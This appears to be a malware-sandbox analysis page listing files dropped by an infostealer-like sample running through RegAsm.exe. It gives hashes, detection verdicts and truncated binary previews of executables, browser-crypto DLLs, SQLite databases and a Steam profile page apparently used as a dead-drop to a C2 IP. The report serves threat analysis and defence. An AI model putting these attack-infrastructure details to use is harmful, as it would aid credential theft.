C:\ProgramData\BFBKFHIDHIIJ\JJJJEB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BFBKFHIDHIIJ\JJJJEB-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BFBKFHIDHIIJ\KKFCFB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BFBKFHIDHIIJ\KKKJEB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FCGCGDHJEGHJ\DAAFII

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FCGCGDHJEGHJ\EHDHDH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIIIIJDHJE.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	413224
Entropy (8bit):	7.989371105778008
Encrypted:	false
SSDEEP:	12288:WFVCXJfc+aP2LQB0g7YUsKEJGxhimXJEO:MCX2d+LQqbKEJQim5t
MD5:	F73186DF5A030CF7F186B0737C3AF1F7
SHA1:	D15E45FEEFBBC010DB92AE897D80BC7419C0D046
SHA-256:	05C67A9765FE1EBEBCEDAEE376F87A803D7CD37E6C5C19F7D336C2F14A4EF207
SHA-512:	A6E4D6E34748FA8FB9153E2104CF49CC36AF9B22E29C8DF050DE0DB4E14E9DD18ED178B4BBACD6289A0A55B465C996FB931799BA970DFE559C85215DB7E31DF1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`..................................;..S....@...............(..(&...`.......:............................................... ............... ..H............text...D.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B................ <......H..........0...............................................................^.8=..Q..v A.3[R.J.._....f..9.\l..vC#SsnB~.E..~.i..7.}+.V...#..8..f.#XW....b...(..............<O.......1.$.=UN8.)..LL....(K....,r.....%9.L.Y.=0..T4.&.....d....(U....'="...(>.d..+..92...p8.1..Pa\q....]X./a.@0C.PQ...B...v..6....le2....4I3.......P.C:...v.}.Q.wp..S(A.Qg.'..N.._X.mvg...J/J6.^...D^MI.O4.5.+....e...^.DIf?.1$;7..x...M..q.q.{'...I..CN.n...a.P.8....!0..\.^.'...3.._....,\

C:\ProgramData\IDBAFHDGDG.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	385064
Entropy (8bit):	7.98819744237574
Encrypted:	false
SSDEEP:	6144:bymTbhLAP1TbvdrXIFTjCUBfmfq1VpIe+kUWLD38DEVhyF2tLooTPbJBJaINPK7z:bymTiJVr4FTjCUVsq1we++D3FU2CW7aT
MD5:	47697A60A96C5ADEF362D8DA9A274B7D
SHA1:	16DBC512F121C27E2CB48A61D6DCF166AA792E0D
SHA-256:	63D86693917598DF88D518C057C7680B5BD2DE9ADD384425F81EAD95EEE18DBA
SHA-512:	4F18DB753FBD9F08842630DD2AC97DC6B368269C80DFC8A2F880BAA80010DB013C8168A6C19465F5D843AE135B162A63EB2DC1C48EA93C5B255868C77C591A17
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f............................>.... ........@.. ....................... ............`.....................................S.......................(&........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........0............................................................y.YYl.v^...5f.H$...../.W.a.zz..5O..7...f..S.l\.RB.k.5...Eq.....v......B...f............9v...;(.F. .J.g.i..(....B.B.M.s...<..ub. .l.].....Qg...\.Bc.....$........fVGZ.........8....lH;!..."......p.UO.8.Y"....d..\...dD".sm}.c#.?.4?..Y#.......0....VS..X..\|....G...g.:!rM[~...e.Bp..bz.{....`5......\|..\|b.O....G......A.h...}s8...W.PaG?...U.K%.9].\|.....wc\\|..B..K=.D..u..G.@..q...y0g...5..i.......<

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AFHDGDGIID.exe.log

Download File

Process:	C:\ProgramData\AFHDGDGIID.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.345615485833535
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5:	EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1:	250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256:	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512:	2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GIIIIJDHJE.exe.log

Download File

Process:	C:\ProgramData\GIIIIJDHJE.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IDBAFHDGDG.exe.log

Download File

Process:	C:\ProgramData\IDBAFHDGDG.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199780418869[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34725
Entropy (8bit):	5.398399394801287
Encrypted:	false
SSDEEP:	768:udpqme0Ih3tAA6WGA2fcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2Sd:ud8me0Ih3tAA6WGA2FhTBv++nIjBtPF8
MD5:	6775E4FEB45B8D16FDB17414891CF367
SHA1:	72326431638A1A387C8D6DC901E323170EB53AEC
SHA-256:	03967D1239EC4025F44AB6FC4AFF59EA88F514E8E666961C77E8E475989F5B4E
SHA-512:	68E90B9D90F56CCDB41DE7D97CF522673F32296DCCF2244341C6836C035212288DBA2FD24DA93D78A1EE50B6DD17A3C2B050CCD9A881BF18BEA48405728CE17A
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://5.75.211.162\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link href

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5d9ab0d4c7_rdp[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	73216
Entropy (8bit):	7.6619916056452
Encrypted:	false
SSDEEP:	1536:Cnxe3ckl/Q2slz7jHGZI7rBrWMwgN3R29suranxH2ufS/TktxF3s2O6kiz:Cnx0I26z/8uz22gaxH2zT6xFnO6Jz
MD5:	8C46913FBA5CA6A0CB8C4E839EF3A3AE
SHA1:	95EFA5E6909359A0D30E95B8EEAD7D0116F8B693
SHA-256:	1268E903700241813C51A97AF8513C97306FCDC6987F4C7E2E0EC02EB71BD6CB
SHA-512:	B011191A827D75C9018D50BA3DF0BA045BB4EF8000711DCDD1B117F9D257B2FE1F9722C38FE61BCABCCA58DBE281FD7605F43CA3B339B428BCC6F5C3A5B8EC6E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5d9ab0d4c7_rdp[1].exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............."... ...@....@.. ....................................`..................................!..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................!......H.......t...D%...........,...............................................(".....(....6.\|.....(0...Vs1...r...p(....(2...Js1....s3....(4...Zr...p(....(.....oE.....(N...:....r...p(.....r&..p(....(O...(.....r...p(....(....r...p(....oE...:....r...p(....r...p(.....rM..p(.....{....rM..p(....(R...oS...(T...b.:....r...p(.....oU....0..n.........(.....s....(....r...po....(.....s.......o.......o.......o......o..........io.......o.....(......o......+......0../.........(....}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5db9e54794_vfkagks[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	413224
Entropy (8bit):	7.989371105778008
Encrypted:	false
SSDEEP:	12288:WFVCXJfc+aP2LQB0g7YUsKEJGxhimXJEO:MCX2d+LQqbKEJQim5t
MD5:	F73186DF5A030CF7F186B0737C3AF1F7
SHA1:	D15E45FEEFBBC010DB92AE897D80BC7419C0D046
SHA-256:	05C67A9765FE1EBEBCEDAEE376F87A803D7CD37E6C5C19F7D336C2F14A4EF207
SHA-512:	A6E4D6E34748FA8FB9153E2104CF49CC36AF9B22E29C8DF050DE0DB4E14E9DD18ED178B4BBACD6289A0A55B465C996FB931799BA970DFE559C85215DB7E31DF1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
